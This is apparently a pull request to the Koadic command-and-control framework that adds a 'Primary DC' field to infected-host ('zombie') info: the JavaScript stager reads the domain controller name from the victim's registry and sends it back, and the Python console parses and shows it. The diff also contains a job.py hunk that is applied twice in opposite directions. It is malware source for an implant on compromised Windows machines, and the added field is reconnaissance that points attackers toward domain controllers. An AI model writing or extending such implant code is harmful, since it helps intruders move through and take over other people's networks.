### PR TITLE
Added Primary DC to zombie info

### DIFF
--- a/core/commands/zombies.py
+++ b/core/commands/zombies.py
@@ -45,6 +45,7 @@ def print_session(shell, session):
     print_data(shell, "IP", session.ip)
     print_data(shell, "User", session.user)
     print_data(shell, "Hostname", session.computer)
+    print_data(shell, "Primary DC", session.dc)
     print_data(shell, "OS", session.os)
     print_data(shell, "Elevated", "YES!" if session.elevated == session.ELEVATED_TRUE else "No")
     shell.print_plain("")

--- a/core/job.py
+++ b/core/job.py
@@ -52,7 +52,7 @@ class Job(object):
         self.errno = str(errno)
         self.errdesc = errdesc
         self.errname = errname
-        self.completed = Job.FAILED
+        self.status = Job.FAILED
         self.sanitize_data(data)
 
         self.print_error()

--- a/core/job.py
+++ b/core/job.py
@@ -52,7 +52,7 @@ class Job(object):
         self.errno = str(errno)
         self.errdesc = errdesc
         self.errname = errname
-        self.status = Job.FAILED
+        self.completed = Job.FAILED
         self.sanitize_data(data)
 
         self.print_error()

--- a/core/session.py
+++ b/core/session.py
@@ -28,6 +28,7 @@ class Session(object):
         self.elevated = self.ELEVATED_UNKNOWN
         self.user = ""
         self.computer = ""
+        self.dc = ""
 
         self.ip = ip
         self.user_agent = user_agent
@@ -50,13 +51,14 @@ class Session(object):
             return False
 
         data = data.encode().split("~~~")
-        if len(data) != 3:
+        if len(data) != 4:
             return False
 
         self.user = data[0]
         self.elevated = self.ELEVATED_TRUE if "*" in data[0] else self.ELEVATED_FALSE
         self.computer = data[1]
         self.os = data[2]
+        self.dc = data[3].split("\\\\")[1] if data[3] else "Unknown"
 
         self.shell.print_good(
             "Zombie %d: %s @ %s -- %s" % (self.id, self.user, self.computer, self.os))

--- a/data/stager/js/stdlib.js
+++ b/data/stager/js/stdlib.js
@@ -137,6 +137,19 @@ Koadic.user.OS = function()
     return "Unknown";
 }
 
+Koadic.user.DC = function()
+{
+    try
+    {
+        var DC = Koadic.WS.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\DCName");
+        return DC;
+    }
+    catch(e)
+    {
+        return false;
+    }
+}
+
 
 Koadic.user.info = function()
 {
@@ -148,6 +161,7 @@ Koadic.user.info = function()
 
     info += "~~~" + net.ComputerName;
     info += "~~~" + Koadic.user.OS();
+    info += "~~~" + Koadic.user.DC();
 
     return info;
 }


### PR DESCRIPTION
This PR adds an infected machine's primary domain controller hostname to its zombie info. The registry value used is HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Group Policy\\History\\DCName. If not defined because the target is not joined to a domain or for whatever other reason, Primary DC will be displayed as Unknown.